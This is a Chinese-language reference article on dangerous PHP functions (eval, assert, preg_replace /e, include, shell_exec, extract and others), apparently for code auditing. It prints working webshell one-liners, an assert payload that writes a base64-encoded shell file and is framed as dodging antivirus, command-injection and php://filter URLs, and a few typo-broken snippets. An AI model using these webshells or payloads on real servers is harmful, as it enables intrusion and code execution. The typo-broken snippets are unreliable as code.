1 php代码执行函数
1.2 eval
mixed eval(string $code)
把字符串$code作为PHP代码执行。
很多常见的webshell都是用eval来执行具体操作的。
<?php @eval($_POST['v']);?>
bool assert(mixed $assertion [, string $description]) //调试函数
检查一个断言是否为FALSE,(把字符串$assertion作为PHP代码执行)
因为大多数杀软把eval列入了黑名单了,所以用assert来替代eval来执行具体操作的。
<?php $_GET[a]($_GET[b]);?>
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PDwaHAgQGV2YWw%29%29};
@eval('echo "test";');
echo "test";
@eval('echo "test";');
echo "\r\n"
echo "test";
结果:
test
test
1.2 assert
assert('system("whoami");');
因为大多数杀毒软件把eval 列入黑名单,所以用assert来代替eval来执行具体操作
1.3 preg_replace
mixed preg_replace(mixed $pattern, mixed $replacement, mixed $subject [, int $limit= -1 [, int &$count]])
/e修正符使preg_replace()将replacement参数当作PHP代码
preg_replace("/test/e","phpinfo();","jutst test");
如果我们提交?h=phpinfo(), phpinfo()将会被执行
1.4 匿名函数
php特性,变量可以当作函数名执行。
string create_function(sting $args, sting $code)
创建一个匿名函数,并返回独一无二的函数名。
$newfunc = create_function('$v', 'return system(&v);');
$newfunc('whoami');相当于system('whoami');
$cfunc = create_function('$v', 'return system($v);');
$cfunc('whoami');
结果:
shadowtest\shadowtest
另外一种形式的匿名函数
$sfunc = 'sys'.'tem';
$sfunc('whoami');
结果:
shadowtest\shadowtest
1.5 回调函数
- mixed call_user_func(callabel $callback [,mixed $parameter [, mixed $...]])
第一个参数callback是被调用的回调函数,其余参数是回调函数的参数
function test($var){
echo "callable test $var";
}
call_user_func('test','shadowtest');
call_user_func('system','whoami)
结果:
callable test shadowtest
shadowtest\shadowtest
- mixed call_user_func_array(callable $callback, array $param_arr)
第一个参数作为回调函数(callback)调用,把参数数组(param_arr)作为回调函数的参数传入
2 包含函数
- require
- include
- require_once
- include_once
包含函数一共有四个,主要作用为包含并运行指定文件(运行php标签里的php代码)
include $file;
include($_GET['file']);
在变量$file可控的情况下,我们可以包含任意文件,从而达到getshell的目的。
另外,在不同的配置环境下,可以包含不同的文件。
因此又分为远程文件包含和本地文件包含。
包含函数也能够读取任意文件内容,这就需要用到【支持的协议和封装的协议】和【过滤器】。例如,利用php流读取任意文件
include($_GET['file']);
?file=php://filter/convert.base64-encode/resource=index.php
3 命令执行函数
执行函数包括但不限于下述几个。
3.1 exec()
执行一个外部程序
3.2 passthru()
执行外部程序并且显示原始输出
3.3 proc_open()
执行一个命令,并且打开用来输入/输出的文件指针
3.4 shell_exec()
echo shell_exec('ping 127.0.0.1');
echo shell_exec('ping' . $_GET["v"]);
#访问http://www.shadowflow.com/test_fun.php?v=127.0.0.1|whoami执行whoami系统命令
通过shell环境执行命令,并且将完整的输出以字符串的方式返回。
3.5 system()
执行外部程序,并且显示输出
3.6 popen()
通过popen()的参数传递一条命令,并对popen()所打开的文件进行执行
4 文件操作函数
copy------------------------拷贝文件
file_get_contents---------将整个文件读入一个字符串
file_put_contents---------将一个字符串写入文件
file----------------------------把整个文件读入一个数组中
fopen------------------------打开文件或者url
move_uploaded_file----将上传的文件移动到新位置
readfile----------------------输出文件
rename---------------------重命名一个文件或目录
rmdir------------------------删除目录
unlink & delete-----------删除文件
任意文件读取,写入, 删除往往是上面几个函数受到了控制(当然还有其他函数)
读取:可以读取配置等文件,拿到key
写入:可以写入shell代码相关的内容
删除:可以删除.lock文件而可以重新安装覆盖
5 特殊函数
5.1 信息泄露
phpinfo()
5.2 软连接-读取文件内容
symlink()
一般是在linux服务器上使用的,为一个目标建立一个连接,在读取这个链接所连接的文件的内容,并返回内容
readlin()
5.3 环境变量
string getenv (string $varname)
获取一个环境变量的值
bool putenv(string $setting)
添加setting 到服务器环境变量。环境变量仅存活于当前请求期间。在请求结束时环境会恢复到初始状态
5.5 加载扩展:
bool dl (string $library)
载入指定参数library的PHP扩展
5.6 配置相关
- string ini_get(string $varname)
成功时返回配置选项的值 - string ini_set(string $varname,string $newvalue)
string ini_alter(string $varname, string $newvalue)
设置指定配置选项的值。这个选项会 在脚本运行时保持新的值,并在脚本结束时恢复。 - void ini_restore(string $varname)
恢复指定的配置选项到它的原始值
5.7 数字判断
bool is_numeric(mixed $var)
仅用is_numeric判断而不是用intval转换就有可能插入十六进制的字符串到数据库,进而可能导致sql二次注入
十六进制绕过
5.8 数组相关
bool in_array (mixed $needle, array $haystack [,bool $strict=FALSE])
在haystack中搜索needle,如果没有设置strict则使用宽松的比较。
该函数有一个特性,比较之前会进行自动类型转换
$v = 1;
var_dump(in_array($v,array("1",2,3))); //1 == "1"
echo "\r\n<br />";
var_dump(in_array($v,array("1",2,3),true)); //1 ==="1"
echo "\r\n<br />";
$v = '1abc';
var_dump(in_array($v,array(1,2,3)));//'1abc' == 1
echo "\r\n<br />";
var_dump(in_array($v,array("2",2,3)));
结果:
true
false
true
false
5.9 变量覆盖相关
void parse_str(string &str [, array &$star])
如果str是URL传递入的查询字符串(query string ),则将它解析为变量并设置到当前作用域
int extract(array & $var_array [,int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL
本函数用来将变量从数组中导入到当前的符号表中。检查每个键名看是否可以作为一个合法的变量名,同事也检查和符号表中已有的变量名的冲突
bool mb_parse_str (string $encoded_string [,array &$result])
解析GET/POST/COOKIE数据并设置全局变量。由于PHP不提供原始POST/COOKIE数据,目前它仅能够用于GET数据。它解析了URL编码过的数据,检测其编码,并转换编码为内部编码,然后设置其值为array的result或者全局变量
bool import_request_variables(string $type [,string $prefix])
将GET/POST/Cookie变量导入到全局作用域中,如果你禁用了register_globals, 但又想用到一些全局变量,那么此函数就很有用
5.10 列目录
glob()函数依照libc glob()函数使用规则寻找所有与pattern匹配的文件路径,类似于一般shells所用的规则一样。不进行缩写扩展或参数代替。
echo "<pre>"
print_r(glob("*.php"));
5.11 无参数获取信息
array get_defined_vars(void)
返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量,服务器变量和用户定义的变量。
array get_defined_constants([bool $categorase=false])
返回当前已定义的常量名和值。这包含define()函数创建的,也包含了所有扩展所创建的
array get_defined_functions(void)
返回一个包含所有已定义函数列表的多维数组
array get_include_files(void)
返回所有被include,include_once,require和require_once的文件名
网友评论